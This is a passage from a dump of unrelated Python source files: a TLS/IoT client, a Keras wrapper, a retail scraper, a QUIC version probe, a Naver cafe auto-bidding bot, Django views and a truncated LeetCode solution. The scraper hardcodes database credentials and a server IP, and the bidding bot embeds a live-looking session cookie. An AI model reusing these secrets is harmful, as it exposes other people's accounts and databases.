Initialising operation.')\n\n while not quit:\n step += 1\n server_data = sock.recv(10*4096)\n if len(server_data) > 0:\n logger.debug(\"step {0}: {1}\".format(step, server_data.hex()))\n parser.send(server_data)\n data = parser.read()\n if data:\n logger.debug(\"data: {0}\".format(data.hex()))\n sock.sendall(data)\n quit = True\n\n data = bytes(request, 'utf-8')\n\n logger.debug('request: {0}'.format(data))\n app_data = session.pack_application_data(data)\n logger.debug('app_data: {0}'.format(app_data.hex()))\n\n sock.sendall(app_data)\n time.sleep(1)\n resp = sock.recv(4096)\n logger.debug('resp: {0}'.format(resp.hex()))\n parser.send(resp)\n\n time.sleep(0.5)\n resp = sock.recv(4096)\n logger.debug('resp: {0}'.format(resp.hex()))\n parser.send(resp)\n\n sock.sendall(session.pack_close())\n sock.close()\n logger.debug('done!')\n\n\ndef simulate_ztp(server, port, sim_key, sim_iccid, device_id):\n nibbled_iccid = iccid2bin(sim_iccid).hex()\n request = 'GET /v1/config/{0}?iccid={1} HTTP/1.1\\x0d\\x0a\\x0d\\x0a'.format(device_id, nibbled_iccid)\n logger.debug('request: {}'.format(request))\n\n return __tlssession(server, port, sim_key, nibbled_iccid, request)\n\n\ndef simulate_stc(server, port, sim_key, sim_iccid, device_id, json_data):\n data_length = len(json_data)\n nibbled_iccid = iccid2bin(sim_iccid).hex()\n request = 'POST /v1/data/{0}?iccid={1} HTTP/1.1\\x0d\\x0a'.format(device_id, nibbled_iccid) +\\\n 'Host: pod.iot.platform\\x0d\\x0a' +\\\n 'Content-Length: {0:d}\\x0d\\x0a\\x0d\\x0a{1}'.format(data_length, json_data)\n logger.debug('request: {}'.format(request))\n\n return __tlssession(server, port, sim_key, nibbled_iccid, request)\n","sub_path":"enosim/tlsclient.py","file_name":"tlsclient.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"92637063","text":"import threading\n\nimport tensorflow as tf\nfrom keras.models import load_model\nfacial_expression_model_path = 'models/face_expression.hdf5'\nfall_model_path = 'models/fall_detection.hdf5'\n\nclass MyModel:\n def __init__(self,path):\n self.path=path\n self.model_graph=tf.Graph()\n self.model_sess=tf.Session(graph=self.model_graph)\n self.model=self.load()\n\n\n def load(self):\n with self.model_sess.as_default():\n with self.model_graph.as_default():\n return load_model(self.path)\n\n\n def model_predict(self,roi):\n with self.model_sess.as_default():\n with self.model_graph.as_default():\n return self.model.predict(roi)\n\n\n\n\n","sub_path":"mymodel.py","file_name":"mymodel.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"615920835","text":"from common_module import *\r\n\r\nclass ClubMonaco_Extractor(object):\r\n def extract_categories(self, text):\r\n log_display('ClubMonaco - extracting categories')\r\n soup = get_soup(text)\r\n categories = []\r\n divisions = []\r\n division_items = soup.select('.menuLinks')\r\n for division in division_items:\r\n if 'with-flyout' in division.a['class']:\r\n division_name = division.a.text.strip()\r\n for class_item in division.a['class']:\r\n if class_item.find('flyout-') != -1:\r\n division_flyout_class = class_item\r\n divisions.append({'name' : division_name, 'flyout_class' : division_flyout_class })\r\n base_url = 'http://www.clubmonaco.ca'\r\n pattern_category_id = re.compile('categoryId=(\\d+)')\r\n for division in divisions:\r\n division_menu_div = soup.select('#%s' % 
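# MyModel above pins each Keras model to its own tf.Graph/tf.Session so several
# models can serve predictions concurrently without fighting over TF1.x's global
# default graph. A usage sketch, assuming the .hdf5 files exist at the paths
# defined above (the input shape below is a guess for illustration only):
import numpy as np

face_model = MyModel(facial_expression_model_path)
fall_model = MyModel(fall_model_path)

roi = np.zeros((1, 48, 48, 1), dtype="float32")  # hypothetical preprocessed face crop
preds = face_model.model_predict(roi)            # runs inside face_model's own graph/session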
division['flyout_class'])[0]\r\n division_menu_item_groups = division_menu_div.select('.col')\r\n for menu_group in division_menu_item_groups:\r\n group_name = string.capwords(menu_group.h3.text.strip())\r\n group_subitems = menu_group.select('.leftnav-group > li')\r\n for subitem in group_subitems:\r\n subitem_name = subitem.a.text.strip()\r\n subitem_url = base_url + subitem.a['href'] \r\n category_id = pattern_category_id.findall(subitem_url)[0]\r\n category_name = division['name'] + ' : ' + group_name + \" : \" + subitem_name\r\n categories.append({'name' : category_name, 'url' : subitem_url})\r\n return categories\r\n def extract_category_productlist(self, text, category_id):\r\n log_display('ClubMonaco - extracting products for category')\r\n base_url = 'http://www.clubmonaco.ca'\r\n soup = get_soup(text)\r\n pattern_product_id = re.compile('productId=(\\d+)')\r\n products = []\r\n product_items = soup.select('.product')\r\n for product in product_items:\r\n product_url = base_url + product.select('.product-details')[0].dt.a['href']\r\n product_id = pattern_product_id.findall(product_url)[0]\r\n product_name = string.capwords(product.select('.product-details')[0].dt.a.text)\r\n products.append({'category_id' : category_id, 'id' : product_id, 'name' : product_name, 'url' : product_url})\r\n return products\r\n def extract_product(self, text, base_product_url):\r\n log_display('ClubMonaco - extracting product')\r\n soup = get_soup(text)\r\n swatches = {}\r\n swatch_items = soup.select('.swatches li')\r\n if not swatch_items:\r\n return None\r\n for item in swatch_items:\r\n swatch_name = item.text.strip()\r\n swatch_url = item.img['src']\r\n swatch_id = item['value']\r\n swatch_product_url = base_product_url + '&color=' + swatch_id\r\n swatches.update({swatch_id: {'name' : swatch_name, 'url' : swatch_url, 'product_url' : swatch_product_url}})\r\n # get prices for swatches\r\n pattern_skus = re.compile('skusGen\\.push\\([^;]+\\);', re.DOTALL)\r\n pattern_color_name = re.compile('color: \"([^\"]+)\"')\r\n pattern_color_id = re.compile('colorCode: \"([^\"]+)\"')\r\n pattern_price_regular = re.compile(\"baseUnformatted: ([\\d.]+)\")\r\n pattern_price_sale = re.compile(\"currentUnformatted: ([\\d.]+)\")\r\n sku_items = pattern_skus.findall(text)\r\n for item in sku_items:\r\n if len(item.replace('skusGen.push(', '').replace(');', '').strip()) == 0:\r\n # empty - may be old sku?\r\n continue\r\n color_id = pattern_color_id.findall(item)[0].strip()\r\n if color_id not in swatches.keys():\r\n # empty - may be unavailable ? 
\r\n continue\r\n color_name = pattern_color_name.findall(item)[0].strip()\r\n price_regular = float(pattern_price_regular.findall(item)[0].strip())\r\n price_sale = float(pattern_price_sale.findall(item)[0].strip())\r\n if price_sale == price_regular:\r\n price_sale = 0\r\n swatches[color_id].update({'price_regular' : price_regular, 'price_sale' : price_sale, 'pics' : []})\r\n # get description\r\n description = ''\r\n if soup.select('#tab-details') and soup.select('#tab-details')[0].p:\r\n description = soup.select('#tab-details')[0].p.text\r\n # grab pics\r\n pattern_color_slice = re.compile('colorSliceValuesGen\\.push\\([^;]+\\);', re.DOTALL)\r\n pattern_photo_color_id = re.compile('colorId: \"([^\"]+)\"')\r\n pattern_photo_color_name = re.compile('colorName: \"([^\"]+)\"')\r\n pattern_photo_urls = re.compile('enhancedImageURL: \"([^\"]+)\"')\r\n photo_section_items = pattern_color_slice.findall(text)\r\n for photo_item in photo_section_items:\r\n color_id = pattern_photo_color_id.findall(photo_item)[0].strip()\r\n if not color_id in swatches.keys():\r\n continue \r\n color_name = pattern_photo_color_name.findall(photo_item)[0].strip()\r\n photo_urls = pattern_photo_urls.findall(photo_item)\r\n swatches[color_id].update({'pics' : photo_urls})\r\n return {'description' : description, 'swatches' : swatches }\r\n\r\nclass ClubMonaco_Processor(object):\r\n def __init__(self, retailer_db, extractor):\r\n self.retailer_db = retailer_db\r\n self.extractor = extractor\r\n self.extraction_id = scraper_get_extraction_id()\r\n self.page_pause = 3\r\n self.name = 'clubmonaco'\r\n def insert_categories(self, extraction_id, categories):\r\n log_display('ClubMonaco_Processor - inserting categories')\r\n query = 'replace into clubmonaco_category(extraction_id, id, name, url) value (%s, %s, %s, %s)'\r\n params = []\r\n for idx, category in enumerate(categories):\r\n params.append((extraction_id, idx, category['name'], category['url']))\r\n log_display('ClubMonaco_Processor - %s categories to insert' % len(params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(query, params)\r\n connection.commit()\r\n cursor.close()\r\n def insert_category_productlist(self, extraction_id, products):\r\n log_display('ClubMonaco_Processor - inserting category product list')\r\n query = 'replace into clubmonaco_category_productlist(extraction_id, category_id, product_id, name, url) value (%s, %s, %s, %s, %s)'\r\n params = []\r\n for product in products:\r\n params.append((extraction_id, product['category_id'], product['id'], product['name'], product['url']))\r\n log_display('ClubMonaco_Processor - %s category products to insert' % len(params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(query, params)\r\n connection.commit()\r\n cursor.close()\r\n def insert_product(self, extraction_id, product):\r\n log_display('ClubMonaco_Processor - inserting product')\r\n product_query = 'replace into clubmonaco_product(extraction_id, id, name, description, url, color_id, color_name, color_pic, price_regular, price_sale) value (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\r\n photo_query = 'replace into clubmonaco_productphoto(extraction_id, product_id, color_id, url) value (%s, %s, %s, %s)'\r\n product_params = []\r\n photo_params = [] \r\n for swatch_id, swatch in product['swatches'].items():\r\n product_params.append((extraction_id, product['id'], product['name'], product['description'], swatch['product_url'], 
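# The insert_* methods above all follow one pattern: build a list of parameter
# tuples, then push them through cursor.executemany with a
# "REPLACE INTO ... VALUE (...)" statement, so re-running an extraction
# overwrites rows that share the table's unique key. A condensed standalone
# sketch (connection object assumed; table and columns from insert_categories):
def bulk_replace(connection, rows):
    query = ("replace into clubmonaco_category(extraction_id, id, name, url) "
             "value (%s, %s, %s, %s)")
    cursor = connection.cursor()
    cursor.executemany(query, rows)   # one parameter tuple bound per row
    connection.commit()
    cursor.close()

# bulk_replace(conn, [(7, 0, "Men : Shirts", "http://www.clubmonaco.ca/shirts")])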
swatch_id, swatch['name'], swatch['url'], swatch['price_regular'], swatch['price_sale']))\r\n for photo_url in swatch['pics']:\r\n photo_params.append((extraction_id, product['id'], swatch_id, photo_url))\r\n log_display('ClubMonaco_Processor - inserting %s product photos' % len(photo_params))\r\n connection = self.retailer_db.get_connection()\r\n cursor = connection.cursor()\r\n cursor.executemany(product_query, product_params)\r\n cursor.executemany(photo_query, photo_params)\r\n connection.commit()\r\n cursor.close()\r\n def run(self):\r\n if self.extraction_id is None:\r\n log_display('ClubMonaco - inserting fresh extraction run')\r\n self.extraction_id = self.retailer_db.scrape_get_extraction_id_for_run(self.name)\r\n log_display('ClubMonaco - extraction id is %s' % self.extraction_id)\r\n home_url = 'http://www.clubmonaco.ca/'\r\n log_display('ClubMonaco - getting homepage for categories via url %s' % home_url)\r\n text = get_page(home_url)\r\n categories = self.extractor.extract_categories(text)\r\n self.insert_categories(self.extraction_id, categories)\r\n identified_products = {}\r\n for cidx, category in enumerate(categories):\r\n page_no = 0\r\n while True:\r\n time.sleep(self.page_pause)\r\n page_no = page_no + 1\r\n url = '%s&size=99&page=%s' % (category['url'], page_no)\r\n log_display('ClubMonaco - getting category product list via url %s' % url)\r\n text = get_page(url)\r\n products = self.extractor.extract_category_productlist(text, cidx)\r\n self.insert_category_productlist(self.extraction_id, products)\r\n for product in products:\r\n if product['id'] not in identified_products.keys():\r\n identified_products[product['id']] = product\r\n soup = get_soup(text)\r\n if not soup.select('.next'):\r\n break\r\n for pid, product in identified_products.items():\r\n time.sleep(self.page_pause)\r\n log_display('ClubMonaco - getting product via url %s' % product['url'])\r\n text = get_page(product['url'])\r\n product_info = self.extractor.extract_product(text, product['url'])\r\n if product_info is None:\r\n continue\r\n product.update(product_info)\r\n self.insert_product(self.extraction_id, product)\r\n self.retailer_db.scrape_update_endtime_for_extraction_id(self.extraction_id)\r\n\r\nconfig = {\r\n 'RetailerDB' : {\r\n 'user' : 'Akon',\r\n 'pwd' : 'Ef351egUAQ-jZ-V',\r\n 'host' : '104.236.57.214',\r\n 'db' : 'retailers'\r\n }\r\n}\r\nretailerDB = MySQLAdapter(config['RetailerDB'])\r\nextractor = ClubMonaco_Extractor()\r\nprocessor = ClubMonaco_Processor(retailerDB, extractor)\r\n\r\nprocessor.run()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"scripts/f21/clubmonaco.py","file_name":"clubmonaco.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118182977","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys, time, os, struct, random\nimport asyncio\n\n\ndef data_coll(_rtt):\n global recv_i, sum_rtt\n\n recv_i += 1\n sum_rtt += _rtt\n\n\ndef len_data_head(data):\n len_idh = 1 # data[0]\n len_version = 4 # data[1:5]\n len_DCIL = 1 # data[5]\n len_DCID = data[len_idh + len_version] # data[6:6+len_DCIL]\n len_SCIL = 1 # data[6+len_DCIL]\n len_SCID = data[len_idh + len_version + len_DCIL + len_DCID]\n return 7 + len_DCID + len_SCID # 7 + data[6+data[5]] + data[5]\n\n\ndef dummy_version_packet(f): # 1:23 0:15\n if f: # QUIC Long Header\t[8-f][0-f] 00000000(32bitVer) DCID Len == SCID Len == 8\n # qdata = struct.pack('!B',random.randint(0,255)|0x80) + b'\\x00\\x00\\x00\\x00\\x50' + 
os.urandom(8)\n qdata = struct.pack('!B',random.randint(0,255)|0x80) + struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) + b'\\x08' + os.urandom(8) + b'\\x08' + os.urandom(8) + b'\\x00'*1177\n len_h = 23\n else: # SCID Len == 0 DCID Len == [8,20]\n # qdata = struct.pack('!B',random.randint(0,255)&0x7d|9) + os.urandom(8) + struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) # '\\x00\\x00\\x00\\x00'\n _rl = random.randint(8,0x14)\n qdata = struct.pack('!B',random.randint(0,255)|0x80) + random.choice([b'\\xff',b'\\x00']) + os.urandom(3) + struct.pack('!B',_rl) + os.urandom(_rl) + b'\\x00'*1186\n len_h = 7 + _rl\n print('\\tSend Query: %s'%' '.join('%02X'%x for x in qdata[:len_h]))\n return qdata\n '''\n struct.pack('!B',random.randint(0,255)&0x7d|9) # random.randint(0,7)*16+9+random.choice([0,4]) [0-7][9|d]\n struct.pack('!Q',random.randint(0,0xFFFFFFFFFFFFFFFF)) # os.urandom(8) CID(64bit)\n struct.pack('!L',random.randint(0,0xffffffff)&0xfafafafa|0x0a0a0a0a) # '*a*a*a*a' Ver(32bit)\n '''\n\nclass UdpHandler:\n global query_count\n\n def __init__(self, target_hostname, target_port):\n self.target_hostname = target_hostname\n self.target_port = target_port\n self.recv_count = 0\n\n def connection_made(self, transport):\n self.transport = transport\n self.s_time = time.time()\n\n for _ in range(query_count):\n self.transport.sendto(dummy_version_packet(random.randint(0,1)))\t# random.randint(0,1)\n\n def datagram_received(self, data, addr):\n global QUIC_Ver\n if self.recv_count == 0:\n len_h = len_data_head(data)\n QUIC_Ver = str(data[len_h:])[2:-1] # .decode('utf8','ignore')\n self.recv_count += 1\n print(' Recv Data:\\t(%d/%d)\\n %r'%(self.recv_count, query_count, data))\n data_coll(time.time() - self.s_time)\n # print('\"{}:{}\" is enabled QUIC.\\tRTT={}ms'.format(self.target_hostname, self.target_port, time.time() - self.s_time))\n if self.recv_count == query_count: self.transport.close()\n\n def error_received(self, transport):\n print('\"{}:{}\"\\t{}'.format(self.target_hostname, self.target_port, transport))\n self.transport.close()\n\n def connection_lost(self, transport):\n loop = asyncio.get_event_loop()\n loop.stop()\n\n\ndef stop_event_loop(event_loop, timeout, s_addr, q_port):\n \"\"\"Terminates event loop after the specified timeout.\"\"\"\n def timeout_handler():\n event_loop.stop()\n\n print('\"{}:{}\" \\tTimeout...\\t{}ms'.format(s_addr, q_port, timeout*1000))\n event_loop.call_later(timeout, timeout_handler)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n #print(\"Start:\",time.ctime(), time.time())\n global recv_i, sum_rtt, query_count\n recv_i = sum_rtt = 0\n query_count = 3\n query_timeout = 1.6\n query_port = 443\n server_addr = \"127.0.0.1\"\n if len(sys.argv) > 1 : server_addr = sys.argv[1]\n if len(sys.argv) > 2 : query_port = sys.argv[2]\n# args = cli.parse_args(sys.argv[1:])\n# server_addr = net.resolve_hostname(args.host)\n\n event_loop = asyncio.get_event_loop()\n connect = event_loop.create_datagram_endpoint(\n lambda: UdpHandler(server_addr, query_port),\n remote_addr=(server_addr, query_port)\n )\n event_loop.run_until_complete(connect)\n stop_event_loop(event_loop, query_timeout, server_addr, query_port)\n event_loop.run_forever()\n #print(\"End:\",time.ctime(), time.time())\n if recv_i:\n print('\"{}:{}\" is enabled QUIC. 
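# The detector above hands create_datagram_endpoint a protocol factory and lets
# asyncio call connection_made / datagram_received / error_received /
# connection_lost on it. A minimal standalone version of that wiring (host and
# port are illustrative):
import asyncio

class PingClient:
    def connection_made(self, transport):
        self.transport = transport
        transport.sendto(b"ping")

    def datagram_received(self, data, addr):
        print("received", data, "from", addr)
        self.transport.close()

    def error_received(self, exc):
        print("error:", exc)

    def connection_lost(self, exc):
        asyncio.get_event_loop().stop()

loop = asyncio.get_event_loop()
loop.run_until_complete(
    loop.create_datagram_endpoint(PingClient, remote_addr=("127.0.0.1", 9999)))
loop.run_forever()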
({})\\tRTT={:.2f}ms\\t{}/{}'.format(server_addr, query_port, QUIC_Ver, sum_rtt*1000/recv_i, recv_i, query_count))\n with open('QUIC-r.txt', 'a') as wf: wf.write('%s\\t%s\\t%.2f\\t%d|%d\\t%s\\n'%(time.strftime('%Y%m%d %X'), server_addr, sum_rtt*1000/recv_i, recv_i, query_count, QUIC_Ver))\n\nif __name__ == '__main__':\n main()\n","sub_path":"quic_version_detector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425486301","text":"\n#%%\n\nimport prod_1 as p\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nimport json\nfrom openpyxl import load_workbook\n\np.open_window.browser_setup()\n\n#%%\n\n# PRODUCT NUMBER\nproduct_number = 281175\n\n#CAFE NUMBER\ncafe_name = '7silverfactory7'\n\n# 7silverfactory7\n# dodohi0607\n# soojip114\n\n\nnaver_cookie = 'NRTK=ag#all_gr#1_ma#-2_si#0_en#0_sp#0; NNB=J2ZVYNYXP2MV6; nx_ssl=2; ASID=77f773540000017630e9510000000067; nid_inf=959657076; NID_AUT=KbzwToCw88MVjp3A/Q9SZnknWKQ8yGm6JmX3+mYIOuETiZgaoCpiT6g3ik9LdT5Y; NID_JKL=lNlg2g4l0j+U4oZxs4OTLWsaZr9zUpYRdypoXffXy3A=; NID_SES=AAABo5uEtwhMXAL5KJ7cY5i5J6O53xjuQSTbVC9tUB3vaK7YFdrtHnlaQN4StnwpapRnitS/7PnaQyP8njyY4zNvSoLhSUZoBea9c04hrKb2Y9LUkqDJIFzMxMjHq12l9zHX43XRQSCmsNodvUgZdiuHV7eGkCYleQfXX97YyJXoZyLhOF6i8WjEBS5E3zaz7Hl0lu4+xzjIMuiLaPwVv+BF9T1n8rzrUAIgfdFGnBBoduFiVlwQ5E+opHX+2i9J8T0w2t+Px1L2SM/i5FJ/wXIh0sUp8vnNqu9ziDOPp924vK66mn6itHgDJmABIRNZlLChiTzhzXOwgjIXjaR8SlhNaJZiQhz+fjEcjiXbJ+D8r9PY902NH5h5Gu2UKkPKNLcJNqruO3Wb8/uwVBXDUdkQRaVEIV2RXJn89tL0f4p8mzUGbeWnG98HVEW7KItvCD84f7vtZXnffowWMEzD78bKSHTO3vl4wUZYHvO/vKiTQdJq+T7d20i6ZjOYTNXl9n7k/XFPjyODXXDcWlXB9YlrQLgmPKWCoDUIcYWN9LFXyMbiSkAm2p3YMVOfjOmkv5gSQQ=='\n\n\n\n# TIME\ntime = p.datetime.time(21, 8, 50)\n# ALPHA\nalpha = 200\n# MAX BID\nmax_bid = 15.0 # 만원\n# MIN BID\nmin_bid = 1.0 # 만원\n\n\n\n\n\n# URL\nurl = \"https://cafe.naver.com/{0}/{1}\".format(cafe_name, product_number)\n\n# Cafe number\nif cafe_name == \"soojip114\":\n cafe_number = 12097718\nelif cafe_name == \"dodohi0607\":\n cafe_number = 19278526\nelse:\n cafe_number = 23303375\n\n\n# Delta\ndelta = 0.85\n# Max BID and Min BID Multiplier\nmax_bid *= 10000\nmin_bid *= 10000\n# Run time\nrun_time = p.datetime.datetime.combine(p.datetime.date.today(), time)\np.browser.get(url)\n\n#%%\n\n\ndef price_list(product_number = product_number, naver_cookie = naver_cookie):\n\n headers = {\n 'authority': 'apis.naver.com',\n 'accept': 'application/json, text/plain, */*',\n 'x-cafe-product': 'pc',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',\n 'origin': 'https://cafe.naver.com',\n 'sec-fetch-site': 'same-site',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'accept-language': 'en-US,en;q=0.9,es;q=0.8,ko;q=0.7',\n 'cookie': naver_cookie\n }\n\n params = (\n ('requestFrom', 'A'),\n ('orderBy', 'asc'),\n )\n\n response_price_list = p.requests.get('https://apis.naver.com/cafe-web/cafe-articleapi/cafes/{0}/articles/{1}/comments/pages/1'.format(cafe_number, product_number), headers=headers, params=params)\n\n #print(response_price_list.elapsed.total_seconds())\n\n # print('HTTP Status: {0}\\nReason: {1}'.format(response_price_list.status_code, response_price_list.reason))\n\n return response_price_list\n\ndef final_price():\n global final_list\n min_price = pd.Series([min_bid], [1004], name='content')\n list1 = json.loads(price_list(product_number, naver_cookie).text)\n list2 = 
json_normalize(list1['comments']['items'])['content'].replace(',','', regex=True).replace('요','', regex=True).replace('원','', regex=True).replace('~','', regex=True).replace(' ','', regex=True)\n list3 = list2[list2.apply(lambda x: x.isdigit())].astype(int)\n final_list = list3[list3.apply(lambda x: (x % 100 == 0) and (x < 2000000))].append(min_price)\n final_price = int(max(final_list))\n return final_price\n\n\n\n# '원' '요' '~', ',' 및 스페이스 삭제 후 숫자축출\n# 200만원 까지만 집계\n\n# '.', '\\n' 마크가 있으면 제외됨\n\ndef final_output(final_price, alpha, test = \"Y\"):\n\n global start_time\n global finish_time\n global time_taken\n global bid\n \n # Taking timestamp\n start_time = str(p.datetime.datetime.now())\n start_time2 = p.time.time()\n\n # Get the browser refresh\n p.browser.switch_to.frame(\"cafe_main\")\n\n bid = final_price() + alpha\n\n try:\n p.WebDriverWait(p.browser, 10).until(\n p.EC.visibility_of_element_located((p.By.CLASS_NAME, \"register_box\")))\n finally:\n\n if test == \"N\": # PRODUCTION\n\n # This piece will not write anything as this will run with scheduler\n elem = p.browser.find_element_by_class_name(\"comment_inbox_text\")\n if bid < max_bid:\n elem.send_keys(bid)\n p.browser.find_element_by_class_name(\"register_box\").click()\n else:\n elem.send_keys(bid)\n\n else: # Practice. This piece will write because it will only be used outside the scheduler\n if bid < max_bid:\n print(\"bid executed\")\n else:\n print(\"no bid executed\")\n\n p.browser.switch_to_default_content()\n finish_time = str(p.datetime.datetime.now())\n time_taken = p.time.time() - start_time2\n\n\n# 엑셀파일 저장\ndef saving_excel():\n # new dataframe with same columns\n printing_results = pd.DataFrame({'id_vars':['bid', 'alpha', 'max_bid', 'start_time', 'finish_time', 'time_taken', 'url', 'run_time','final_list'],'value_vars':[bid, alpha, max_bid, start_time, finish_time, time_taken, url, run_time, final_list]})\n\n writer = pd.ExcelWriter('saving_results.xlsx', engine='openpyxl')\n # try to open an existing workbook\n writer.book = load_workbook('saving_results.xlsx')\n # copy existing sheets\n writer.sheets = dict((ws.title, ws) for ws in writer.book.worksheets)\n\n # read existing file\n reader = pd.read_excel(r'saving_results.xlsx')\n # write out the new sheet\n printing_results['value_vars'].to_excel(writer, sheet_name=\"Sheet1\", startcol=writer.sheets['Sheet1'].max_column, index = False,header= False) #startrow=len(reader)+1)\n\n writer.close()\n\ndef final_job(run_time = run_time, delta = delta):\n execution_time = p.time.strptime(str(run_time + p.datetime.timedelta(seconds=9)), '%Y-%m-%d %H:%M:%S') # string 에서 시간으로 변경\n target_time = p.time.mktime(execution_time) - delta # 시간을 epoch 로 변경. 
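# The Korean comments above note: strip '원', '요', '~', ',' and spaces before
# extracting digits; tally bids only up to 2,000,000 won; entries containing '.'
# or a newline drop out of the digit filter. A condensed standalone run of the
# same pandas chain on toy comment strings:
import pandas as pd

comments = pd.Series(["150,000원", "16만", "155000", "insta @user", "2000001"])
cleaned = comments.replace(",", "", regex=True).replace("원", "", regex=True)
digits = cleaned[cleaned.apply(lambda x: x.isdigit())].astype(int)
bids = digits[digits.apply(lambda x: (x % 100 == 0) and (x < 2000000))]
print(int(bids.max()))  # -> 155000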
시간 미세하게 delta 로 조정\n p.browser.get(url)\n sleeping = p.time.sleep(target_time - p.time.time())\n final_output(final_price, alpha, \"N\")\n saving_excel()\n\n#%%\n\n# Do not run if this is not a test\n\nfinal_output(final_price, alpha, \"Y\")\n\n#%%\n\n\n# Review Run\n\nprint(final_list)\nprint(\"\\n--- bid: %s ---\" % bid)\nprint(\"--- alpha: %s ---\" % alpha)\nprint(\"--- max bid: %s ---\" % max_bid)\nprint(\"\\n--- %s seconds ---\" % start_time)\nprint(\"--- %s seconds ---\" % finish_time)\nprint(\"--- %s seconds ---\" % time_taken)\nprint(\"\\n--- url: %s ---\" % url)\nprint(\"--- run time: %s ---\" % run_time)\n\n\n#%%\n\n#############################################################################################\n#############################################################################################\n# PRODUCTION!!!!!!!!!\n\n# This code is to hide the main tkinter window\nroot = p.tkinter.Tk()\nroot.withdraw()\n\n# Message Box\np.messagebox.showinfo(\n \"check\", \"***ALPHA: {} ***\\n***MAX BID: {} ***\\n***TIME: {} ***\\n***URL: {} ***\".format(alpha, max_bid, run_time, url))\n\n\n# Production scheduler\n\nsched = p.BackgroundScheduler()\nsched.start()\n\njob = sched.add_job(final_job, 'date', run_date=run_time)\n\n#############################################################################################\n#############################################################################################\n\n\n#%%\n\n# Wrap-up\n\nsched.shutdown(wait=False)\n\n\n# %%\n\n# list(a.keys())\n# list1 = json.loads(price_list().text)\n# df = json_normalize(list1['comments']['items'])\n# df\n\n\n\n# Reference\n\n# https://developers.naver.com/docs/cafe/api/\n# https://blog.naver.com/popqser2/221430894929\n# https://requests.readthedocs.io/en/latest/api/\n# https://stackoverflow.com/questions/47242845/pandas-io-json-json-normalize-with-very-nested-json\n\n# 엑셀파일 생성\n# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_excel.html\n# https://medium.com/better-programming/using-python-pandas-with-excel-d5082102ca27\n\n# %%\n\n\n\n","sub_path":"골드/경매/prod_6.py","file_name":"prod_6.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161590039","text":"from datetime import (\n datetime,\n timedelta\n)\n\nfrom django.shortcuts import (\n render,\n redirect\n)\nfrom django.urls import reverse\n\nfrom ..models import (\n Bulletin,\n Product,\n VacationSettings\n)\nfrom django.core.paginator import Paginator\n\n\ndef index(request):\n vacation_settings = VacationSettings.load()\n\n if 'cart' not in request.session:\n request.session['cart'] = []\n\n if vacation_settings.active:\n return redirect(reverse('shop:vacation'))\n else:\n return redirect(reverse('shop:main'))\n\n\ndef vacation_index(request):\n return render(request, 'shop/temp_index.html')\n\n\ndef main_index(request):\n today = datetime.now()\n month_ago = today - timedelta(days=int(30))\n all_products = Product.objects.filter(status='A').order_by('-created_at').prefetch_related('pen').prefetch_related('image')\n paginator = Paginator(all_products, 24)\n products = paginator.page(1)\n context = {\n 'products': products,\n 'bulletins': Bulletin.objects.filter(updated_at__range=(month_ago, today), active=True).order_by('-updated_at')[:1]\n }\n\n return render(request, 'shop/index.html', context)\n\n\ndef news(request):\n bulletins = Bulletin.objects.filter(active=True).order_by('-updated_at')\n context = {\n 
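# main_index above serves a fixed first page of 24 products via
# Paginator(all_products, 24).page(1). A standalone sketch of how Paginator
# slices (a plain range stands in for the queryset):
from django.core.paginator import Paginator

paginator = Paginator(range(100), 24)      # 100 items, 24 per page
assert paginator.num_pages == 5            # four full pages plus one partial
first_page = paginator.page(1)
assert list(first_page.object_list) == list(range(24))
assert first_page.has_next()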
\"bulletins\": bulletins,\n }\n return render(request, 'shop/news.html', context)\n\n\ndef not_found(request, exception):\n return render(request, 'shop/404.html')\n","sub_path":"apps/shop/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"496244131","text":"# LC 654. Maximum Binary Tree\n\n'''\nYou are given an integer array nums with no duplicates. A maximum binary tree can be built recursively from nums using the following algorithm:\n\nCreate a root node whose value is the maximum value in nums.\nRecursively build the left subtree on the subarray prefix to the left of the maximum value.\nRecursively build the right subtree on the subarray suffix to the right of the maximum value.\nReturn the maximum binary tree built from nums.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n'''\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: List[int]) -> Optional[TreeNode]:\n return self.monostack(nums)\n\n # O(n^2) time | O(n) space\n def recursive(self, nums: List[int]) -> Optional[TreeNode]:\n if len(nums) == 0:\n return None\n\n max_idx = 0\n\n for i in range(len(nums)):\n if nums[i] > nums[max_idx]:\n max_idx = i\n\n node = TreeNode(nums[max_idx])\n node.left = self.constructMaximumBinaryTree(nums[:max_idx])\n node.right = self.constructMaximumBinaryTree(nums[max_idx + 1:])\n\n return node\n\n # O(n) time | O(n) space\n def monostack(self, nums: List[int]) -> Optional[TreeNode]:\n node = TreeNode(float('inf'))\n 